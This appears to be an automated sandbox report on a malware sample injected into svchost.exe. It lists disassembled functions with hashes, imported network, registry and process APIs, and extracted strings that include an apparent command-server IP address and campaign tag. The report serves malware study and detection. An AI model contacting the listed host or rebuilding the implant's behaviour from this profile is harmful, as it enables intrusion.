Download Yara Rule

Strings

@, xrefs: 00076C47

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f8a531e8220cb30f4d64ad8b0fde06207c87cfbcd4d044ea7a4bad17df862fb8
Instruction ID: 2d77929e9b498c13caf13fc07a735db76f58b42e0686f24ece32115e5161af9d
Opcode Fuzzy Hash: f8a531e8220cb30f4d64ad8b0fde06207c87cfbcd4d044ea7a4bad17df862fb8
Instruction Fuzzy Hash: BC020F70718B488FE7A8EF28D45976AB6E1FB99301F54452EE04EC3291DF39D841CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0007B420, Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

8, xrefs: 0007B8B4

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 1fa6986029707459d27ca27e3c7297c3d591b7caa6e60e93f65e526512c60385
Instruction ID: fdf82c843862c23529b60160118c15cbae042d970057da7475b6ec6b15661438
Opcode Fuzzy Hash: 1fa6986029707459d27ca27e3c7297c3d591b7caa6e60e93f65e526512c60385
Instruction Fuzzy Hash: E802093060CB488FE7A4DF29D8457AAB7E5FBD8311F108A2E958EC3250DB78D941CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000788E0, Relevance: 1.6, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

\, xrefs: 00078A92

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: c59adab03c1b6fba4c010502578efc5d52bef2060155ecef05c800cc81c06ccb
Instruction ID: feaa91b24106d5f55a5e0c0df4fa47b3cfc3a2783695bbb219e4e6be828db6ed
Opcode Fuzzy Hash: c59adab03c1b6fba4c010502578efc5d52bef2060155ecef05c800cc81c06ccb
Instruction Fuzzy Hash: 09A1D331658A094BE7659B18C8997BAB3E2FFC8300F54C56ED14EC72A1DF79D842C386

Uniqueness

Uniqueness Score: -1.00%

Function 00071820, Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a20ac6d20214f0669d0be6008a8cde6e36854b07a9f29eedf8e2e2271a47ea
Instruction ID: 05378aa8be32ae717d0a6ded46f5c1ee914f49ae155476b91c6fed83485fb8ce
Opcode Fuzzy Hash: 58a20ac6d20214f0669d0be6008a8cde6e36854b07a9f29eedf8e2e2271a47ea
Instruction Fuzzy Hash: 5FF16031A6CB884BC32D9A6C9C451F9B7D1F799310F54827DD8CFC3283E628E8478689

Uniqueness

Uniqueness Score: -1.00%

Function 0006C960, Relevance: .5, Instructions: 538COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e86fda7c700fc4eeacf95e65527483e887235dd7f6d047b02fce93deb71494
Instruction ID: 012d124d8edfe95bf6c8e7cae0e4b03faf09f91e636a5b7c345ffb5ab24d0fe9
Opcode Fuzzy Hash: 10e86fda7c700fc4eeacf95e65527483e887235dd7f6d047b02fce93deb71494
Instruction Fuzzy Hash: 33E1C631718A084FE758EB3C98567BA73D3EBD9310F54466EE48BC3292EE74DC428685

Uniqueness

Uniqueness Score: -1.00%

Function 00062CCC, Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7bc98818bbdb6b2067e4294e54d32c9e90768c85cf6177a27a6f2016705fe27
Instruction ID: 0e8fa27bf97e5138d38b275e7413dc50c9163477fdeacac5ab8780545d9beaa1
Opcode Fuzzy Hash: d7bc98818bbdb6b2067e4294e54d32c9e90768c85cf6177a27a6f2016705fe27
Instruction Fuzzy Hash: BCE15130618E498FE7A9EF18C495BEA73E3FB98300F54456D984EC72A1DB78D941C782

Uniqueness

Uniqueness Score: -1.00%

Function 00066B60, Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e4aca0082ccab7c9555a6bb809b8f700678e567c663f54212b36009d14d611
Instruction ID: bc6fdd6e8ffd66b81772d16755c27774893569230f473c6067776ba9deb0115c
Opcode Fuzzy Hash: b6e4aca0082ccab7c9555a6bb809b8f700678e567c663f54212b36009d14d611
Instruction Fuzzy Hash: 45D1A430618E5D8FD7A5EB28D8547BAB3E2FF95320F50462DE48AC3291EB35D941C782

Uniqueness

Uniqueness Score: -1.00%

Function 00068440, Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28863a2996926e595d567d9808cc3097754cd4f81bb14fd5d3bcab1d227364b9
Instruction ID: 5caad8ed1e651a27710469d3e843d70fa0fcd0a53f44988b9277b5575fd319e0
Opcode Fuzzy Hash: 28863a2996926e595d567d9808cc3097754cd4f81bb14fd5d3bcab1d227364b9
Instruction Fuzzy Hash: 1FD1BE3121CB488FD7A4EB28D89576BB3E2FB95310F548A2DE58AC3251DF70D845C782

Uniqueness

Uniqueness Score: -1.00%

Function 00064370, Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ac39a9720abbe45aca3ebe190da487c005de3a296c465f539d3b02ea57e680
Instruction ID: 902043d08873cb04429498ea70eeb8579fda3630cff70ee682cc0680d6e1a211
Opcode Fuzzy Hash: 30ac39a9720abbe45aca3ebe190da487c005de3a296c465f539d3b02ea57e680
Instruction Fuzzy Hash: 32916E139ADEF54AC72E0A3C58951B1BBD2EAA731535E03EDDCDBCB283C815984BC194

Uniqueness

Uniqueness Score: -1.00%

Function 0006BD80, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04d2da153e4daa3a90fe94dff0253daba56e3120d16523f9b70fb24ce37baed
Instruction ID: 71236af602337b865bd910ffa41f72a10469b3d4a544cf1df8f12ee1ae33c0ee
Opcode Fuzzy Hash: c04d2da153e4daa3a90fe94dff0253daba56e3120d16523f9b70fb24ce37baed
Instruction Fuzzy Hash: 12B12B60518B1C8AE775AF14D884BFA73D2FF55304F50416ED486CB1B2EF7A9885C781

Uniqueness

Uniqueness Score: -1.00%

Function 00070EF0, Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611256386d79d3d0d06c4297b2e5b0e3dd40b3a84c471bfab61f0d4c8ff58318
Instruction ID: 39fac86eab9a3b14f388649f0dd57c51ece11827bebbc3b94b5b3627a6aa2095
Opcode Fuzzy Hash: 611256386d79d3d0d06c4297b2e5b0e3dd40b3a84c471bfab61f0d4c8ff58318
Instruction Fuzzy Hash: 3D91F930B18A4C4BEBA8B76C98457FD72D5EB99350F44C229E54EC32D2DE6CDC818789

Uniqueness

Uniqueness Score: -1.00%

Function 0006A480, Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71108cfca951854983913d8969ecd2bd5a971f7a0e5daad93c1b405c67c0f827
Instruction ID: 1ce9c44f9102aec063489f7dff22be1e414653d55584c1034d7b6c2382d729e9
Opcode Fuzzy Hash: 71108cfca951854983913d8969ecd2bd5a971f7a0e5daad93c1b405c67c0f827
Instruction Fuzzy Hash: 14913031B1CB584FD7A4EF28945576BB6E2FBC9700F50892EE18ED3255CE3498428B87

Uniqueness

Uniqueness Score: -1.00%

Function 00077650, Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383e60ae6bc82cbb3227383ca093adc164f326803fa47dddefdbbf4f63910728
Instruction ID: 191107f83a9aab1acdab4bd125d95d3c5a71ff06d2b1a39f9649f408eb605e7f
Opcode Fuzzy Hash: 383e60ae6bc82cbb3227383ca093adc164f326803fa47dddefdbbf4f63910728
Instruction Fuzzy Hash: 16915071A1CB584FD7A4EB28944576BB7E1FBC8740F50852EE18EC3255DE38D8428B87

Uniqueness

Uniqueness Score: -1.00%

Function 0007D190, Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84001c21deeaa085a34030257c57640888d70deced4bd599c65c28721ab1fe13
Instruction ID: 6cbb26bb9aaf6e9a9cac2e9824cc94f40af987fe634081f71f242be43ee26031
Opcode Fuzzy Hash: 84001c21deeaa085a34030257c57640888d70deced4bd599c65c28721ab1fe13
Instruction Fuzzy Hash: D581B971A18B1D8FC768EF1C9881676B3E1FF99310F55422EE48EC3241EA24E952C7C6

Uniqueness

Uniqueness Score: -1.00%

Function 00071270, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fabdac14c32df1d43972f6d5f8f3d9a54bc22d7a387abedd7481d691bf7f96d
Instruction ID: 8dcdfb7a9616d4dfe7dc98a26f79e21baa73e4247ca5b7232220f6cf50274046
Opcode Fuzzy Hash: 9fabdac14c32df1d43972f6d5f8f3d9a54bc22d7a387abedd7481d691bf7f96d
Instruction Fuzzy Hash: 5261A93070CB084FD768EB2D94557FAB3D2FB85300F50861EE48FC3192EE68D946868A

Uniqueness

Uniqueness Score: -1.00%

Function 000727E0, Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de8a471fb38fc3774644abba8d83a67f89eb4f0943e814748926cc979d928ae
Instruction ID: 157566d102a46f66a1644267140c59cde08315349a6ceab0720cf6be191a15bf
Opcode Fuzzy Hash: 5de8a471fb38fc3774644abba8d83a67f89eb4f0943e814748926cc979d928ae
Instruction Fuzzy Hash: 4D716C31A18B854BD3A9DB2884583BBB7D2EFD5304F58C67DD489C7251EA3984468386

Uniqueness

Uniqueness Score: -1.00%

Function 000754B0, Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4560f69cde0a8aa422e39bf9c21fdd805002a0c76b25dc1ff3f8875b83ebb00e
Instruction ID: 26ab876802081ba4028e24878d8ba550dc917e584c0fbf5542bf6edd68ba5dc9
Opcode Fuzzy Hash: 4560f69cde0a8aa422e39bf9c21fdd805002a0c76b25dc1ff3f8875b83ebb00e
Instruction Fuzzy Hash: 5B519B21B14E090B96D8BB6D58567FE72C3FBD9311F94816DE44EC3343DE999C42428A

Uniqueness

Uniqueness Score: -1.00%

Function 0006E760, Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecbe5b38f90175e939fb9afb2d5850bf26725d00cc70c95c0608616a4e17637
Instruction ID: dc537e4e3c2dd5b86941253c17ae9915228f926860a01d16895abcf9e82127ea
Opcode Fuzzy Hash: eecbe5b38f90175e939fb9afb2d5850bf26725d00cc70c95c0608616a4e17637
Instruction Fuzzy Hash: A1718E34618B198FDB94EF28C484B6AB7E2FF99300F5545ADE44EC7265DB35D840CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00066660, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a29dafd65cb80882e3f0bc5b87415c9ba5c6325e43ac1f1f9b31bf1b0a55bc82
Instruction ID: 62f2684a0667d11cab69a04b168ef2deea207f1a9aade7e8324de9f271675d57
Opcode Fuzzy Hash: a29dafd65cb80882e3f0bc5b87415c9ba5c6325e43ac1f1f9b31bf1b0a55bc82
Instruction Fuzzy Hash: FF51223061CE194FD7A8EB68D896B7BB3D3FBD9314F5402ADE44AC3152DE26DC418282

Uniqueness

Uniqueness Score: -1.00%

Function 000756E0, Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64a5c436a7e57e9279d3205597f46567704a0a92cb0092ee7492c1c3c7de00c
Instruction ID: 6f6588557511891e5b8874a4d943a5eadc510160afe4cb5140a66b8ac2bbce65
Opcode Fuzzy Hash: f64a5c436a7e57e9279d3205597f46567704a0a92cb0092ee7492c1c3c7de00c
Instruction Fuzzy Hash: BB613730A18F494FE399A73C88447F673C2FB99325F54876DE46EC32E2DE689841C256

Uniqueness

Uniqueness Score: -1.00%

Function 00070660, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba3ee075efa76e15dc1480a090945bd1d4396a6112486fedf5d80ab5da8b0ee
Instruction ID: 8201f2db72fb269b5017d1adadf2b03fcd510cf7e9ad5f90699fb4085c66148e
Opcode Fuzzy Hash: 2ba3ee075efa76e15dc1480a090945bd1d4396a6112486fedf5d80ab5da8b0ee
Instruction Fuzzy Hash: BC519330A1CB498BD7E89B19D8557BEB6D2FBC5310F50862DE48EC3252DE78D841C687

Uniqueness

Uniqueness Score: -1.00%

Function 00068CD0, Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ae90f79837624fabe1971db2763c4975c5c1e5505e9ec46a07440c5f42fd215
Instruction ID: 5a2009785cba66c241553d4f3f99f6f826d2754cea87cd66d804fecf9e1d084e
Opcode Fuzzy Hash: 3ae90f79837624fabe1971db2763c4975c5c1e5505e9ec46a07440c5f42fd215
Instruction Fuzzy Hash: B551B33160CA184FD7A8EB58D895A7A73D7FBD8320F44826DE48EC3251DE35DD428781

Uniqueness

Uniqueness Score: -1.00%

Function 000737D0, Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf42dd45d8e72ee7aa6c945c910b6a2570162e206fd23d0ac4934cb70336b891
Instruction ID: 15b4454200e4507e44da8236ff97085274fc48a7feebb141ac626038b51ccd3d
Opcode Fuzzy Hash: cf42dd45d8e72ee7aa6c945c910b6a2570162e206fd23d0ac4934cb70336b891
Instruction Fuzzy Hash: 0651591596D7D149E32E623C14952F6EFC1CBAB30CF1C566DE9CED3243C41A860B938A

Uniqueness

Uniqueness Score: -1.00%

Function 000782C0, Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8d92e659c2e8ff31b9d83b6547942138191f0da5eec73a28f888948d536b0a1
Instruction ID: 9c3e86b51c539a79c0dcb0d14ca65e1e48bdc2eaeeac6a5d7f3465789076ab97
Opcode Fuzzy Hash: a8d92e659c2e8ff31b9d83b6547942138191f0da5eec73a28f888948d536b0a1
Instruction Fuzzy Hash: 1951D83166CA0D4FE3A5AB29D84D6BB72D1FB85310F40862DD48FC3161EF7899468785

Uniqueness

Uniqueness Score: -1.00%

Function 00072FD0, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21bc741f3d442541668153a169047edcf88b2b9f35b5c7e9e126047166bb553e
Instruction ID: a305098f5c07ec1771b549b8d6f64dff9105432e2f005ce3e625d87839bf5cb7
Opcode Fuzzy Hash: 21bc741f3d442541668153a169047edcf88b2b9f35b5c7e9e126047166bb553e
Instruction Fuzzy Hash: FE51361196D6D109E32A623C04952F7AFC5DBAF708F295AADD8CFC3243C40E890B9386

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 2980 Parent PID: 284 svchost.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	65.1%
Total number of Nodes:	542
Total number of Limit Nodes:	19

Executed Functions

Function 00000001800796DC, Relevance: 95.4, APIs: 42, Strings: 12, Instructions: 860networkfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET ref: 0000000180079737
InternetConnectA.WININET ref: 0000000180079789
HttpOpenRequestA.WININET ref: 00000001800799DB
HttpAddRequestHeadersA.WININET ref: 0000000180079D9D
GetLastError.KERNEL32 ref: 0000000180079DA7
InternetQueryOptionA.WININET ref: 0000000180079DE1
GetLastError.KERNEL32 ref: 0000000180079DEB
InternetSetOptionA.WININET ref: 0000000180079E1B
GetLastError.KERNEL32 ref: 0000000180079E25
HttpSendRequestExA.WININET ref: 0000000180079E75
GetLastError.KERNEL32 ref: 0000000180079E7F
InternetWriteFile.WININET ref: 0000000180079EDE
GetLastError.KERNEL32 ref: 0000000180079EE8
HttpEndRequestA.WININET ref: 0000000180079F04
GetLastError.KERNEL32 ref: 0000000180079F0E
StrToIntExA.SHLWAPI ref: 0000000180079F7C
StrToIntExA.SHLWAPI ref: 000000018007A03C
StrToIntExA.SHLWAPI ref: 000000018007A077
StrToIntExA.SHLWAPI ref: 000000018007A0B2
InternetQueryDataAvailable.WININET ref: 000000018007A13A
InternetReadFile.WININET ref: 000000018007A173
InternetQueryDataAvailable.WININET ref: 000000018007A1C4
InternetCloseHandle.WININET ref: 000000018007A266
InternetCloseHandle.WININET ref: 000000018007A2B8
InternetCloseHandle.WININET ref: 000000018007A2C3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A2E7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A2ED
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A2F3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A2F9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A2FF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A305
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A30B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A311
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018007A317
InternetCrackUrlA.WININET ref: 000000018007A3AE

Strings

InternetWriteFile error %d, xrefs: 0000000180079EEE
1, xrefs: 000000018007988C
Content-Type: , xrefs: 0000000180079AAD
HttpAddRequestHeaders error %d, xrefs: 0000000180079DAD
Error on HttpSendRequestEx %d, xrefs: 0000000180079E85
Accept: , xrefs: 00000001800799FF
[, xrefs: 00000001800797D2
Connection: Close, xrefs: 0000000180079B6B
`, xrefs: 0000000180079901
InternetQueryOption Error: %d, xrefs: 0000000180079DF1
InternetSetOption Error: %d, xrefs: 0000000180079E2B
Error on HttpEndRequest %lu, xrefs: 0000000180079F14

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: Internet$_invalid_parameter_noinfo_noreturn$ErrorLast$HttpRequest$CloseHandleQuery$AvailableDataFileOpenOption$ConnectCrackHeadersReadSendWrite
String ID: 1$Accept: $Connection: Close$Content-Type: $Error on HttpEndRequest %lu$Error on HttpSendRequestEx %d$HttpAddRequestHeaders error %d$InternetQueryOption Error: %d$InternetSetOption Error: %d$InternetWriteFile error %d$[$`
API String ID: 4026803887-1055654493
Opcode ID: 1c2c5cb5b7802cb07c4bea939c84068ce470d7e540ed66d39efe48c3c6b9fdef
Instruction ID: 79fa6295c78ef167a820c3b8f6b4aeb131ca0b55a2017a3164afda5bbb849aea
Opcode Fuzzy Hash: 1c2c5cb5b7802cb07c4bea939c84068ce470d7e540ed66d39efe48c3c6b9fdef
Instruction Fuzzy Hash: 7182E172614BC88AFB52CF78D4403DE77A1F78A784F508215EB9947A9ADF39C689C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800A7D24, Relevance: 85.0, APIs: 14, Strings: 34, Instructions: 984
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001800933D8: SleepEx.KERNEL32 ref: 0000000180093428
Part of subcall function 00000001800933D8: SleepEx.KERNEL32 ref: 000000018009343B
Part of subcall function 00000001800933D8: SetCurrentDirectoryA.KERNEL32 ref: 00000001800934B0
Part of subcall function 00000001800933D8: SetCurrentDirectoryA.KERNEL32 ref: 000000018009350B
Part of subcall function 00000001800933D8: RevertToSelf.ADVAPI32 ref: 0000000180093516

RevertToSelf.ADVAPI32 ref: 00000001800A7F4D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800A819C

Part of subcall function 00000001800B1A50: CreateToolhelp32Snapshot.KERNEL32 ref: 00000001800B1A9E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800A81A2
SleepEx.KERNEL32 ref: 00000001800A81ED
CloseHandle.KERNEL32 ref: 00000001800A8694
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800A8850
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800A8856
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800A885C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800A8862
RtlInitializeCriticalSection.NTDLL ref: 00000001800A89C0
RtlInitializeCriticalSection.NTDLL ref: 00000001800A89E1
RtlInitializeCriticalSection.NTDLL ref: 00000001800A8A2D
CreateThread.KERNEL32 ref: 00000001800A8A64
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800A8C58

Strings

84.17.52.62, xrefs: 00000001800A88DF
=, xrefs: 00000001800A8220
6, xrefs: 00000001800A805B
e, xrefs: 00000001800A7F95
E, xrefs: 00000001800A86C9
red4, xrefs: 00000001800A8920
:, xrefs: 00000001800A8216
b, xrefs: 00000001800A7F77
x, xrefs: 00000001800A8248
l, xrefs: 00000001800A8270
Q, xrefs: 00000001800A7F68
9, xrefs: 00000001800A8211
p, xrefs: 00000001800A7F8B
:, xrefs: 00000001800A821B
S, xrefs: 00000001800A7F5E
?, xrefs: 00000001800A8207
E, xrefs: 00000001800A7F63
*, xrefs: 00000001800A8225
q, xrefs: 00000001800A7F72
t, xrefs: 00000001800A7F81
1, xrefs: 00000001800A8239
:, xrefs: 00000001800A822F
141700_W617601.8B806DE991D43AE26D6F91E8AD26588D, xrefs: 00000001800A895A
x, xrefs: 00000001800A822A
X, xrefs: 00000001800A81EF
t, xrefs: 00000001800A7F7C
*, xrefs: 00000001800A820C
<, xrefs: 00000001800A8243
s, xrefs: 00000001800A7F90
t, xrefs: 00000001800A7F9A
A, xrefs: 00000001800A7DAC
!, xrefs: 00000001800A7F6D
4, xrefs: 00000001800A823E
-, xrefs: 00000001800A8234

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CriticalInitializeSectionSleep$CreateCurrentDirectoryRevertSelf$CloseHandleSnapshotThreadToolhelp32
String ID: !$*$*$-$1$141700_W617601.8B806DE991D43AE26D6F91E8AD26588D$4$6$84.17.52.62$9$:$:$:$<$=$?$A$E$E$Q$S$X$b$e$l$p$q$red4$s$t$t$t$x$x
API String ID: 727350516-949552839
Opcode ID: dfc9ffca2b6213aae8229318cfb7f1cc05be69e4f634059cc00c4dd15911b5c4
Instruction ID: 40c592e09164368d69f717dd1fba9ab1042f40d1ae76f0e32e9f0fcad8750a85
Opcode Fuzzy Hash: dfc9ffca2b6213aae8229318cfb7f1cc05be69e4f634059cc00c4dd15911b5c4
Instruction Fuzzy Hash: 2FA201337182C48DF792DB78E4443DE7B60E7A9388F548215FA894BA9BDE78C249C711

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007C998, Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 347
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32 ref: 000000018007CBD5
RegEnumKeyExA.ADVAPI32 ref: 000000018007CC21
StrStrIA.SHLWAPI ref: 000000018007CC3D
RegCloseKey.KERNEL32 ref: 000000018007CE24
RegOpenKeyExA.ADVAPI32 ref: 000000018007CE4A
RegQueryValueExA.ADVAPI32 ref: 000000018007CE8C
RegCloseKey.KERNEL32 ref: 000000018007CEBF

Strings

N, xrefs: 000000018007CC60
m, xrefs: 000000018007CCC9
_, xrefs: 000000018007CC6A
